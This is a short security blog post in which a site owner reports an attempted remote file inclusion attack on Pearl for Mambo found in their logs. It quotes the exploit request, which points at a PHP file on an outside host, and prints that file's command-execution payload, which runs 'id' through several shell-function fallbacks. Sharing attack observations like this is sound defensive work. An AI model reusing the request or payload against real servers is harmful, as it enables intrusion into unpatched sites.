On the 11′th of December (04:17:52) I recieved the following request to this site:

“GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.asoc-posidonia.es/pr.txt?? HTTP/1.1″

Looks like someone is trying to exploit a RFI vulnerability in Pearl for Mambo. This particular issue was disclosed over a year ago and they are still scanning for it… Must be a lot of unpatched fish in the internet tubes…

The file that is supposed to be included is live and contains the following:

echo "549821347819481<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."<br>";
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

The attacking host was:

80.237.200.81 (jam.seppenra.de)
Windows CE, Generic Gecko
Cologne, Germany,DE,50.9333,6.95
Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007

What about doing error checking verifying that the target contains vulnerable code? Doesn’t take much time and seems like a reasonable thing to do if you want to stay (at least a little bit) under the radar.

Anyhow, this gave me a good idea which I will present in a future post.

All involved system owners has been notified.